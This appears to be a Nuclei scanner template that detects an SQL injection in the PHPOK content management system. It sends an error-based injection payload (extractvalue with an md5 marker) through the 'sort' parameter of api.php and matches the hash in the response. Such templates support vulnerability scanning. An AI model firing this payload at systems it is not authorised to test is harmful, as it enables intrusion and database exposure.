id: phpok-sqli

info:
  name: PHPOK - Sql Injection
  author: ritikchaddha
  severity: high
  metadata:
   verified: true
    fofa-query: app="phpok"
  tags: phpok,sqli

variables:
  num: "999999999"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'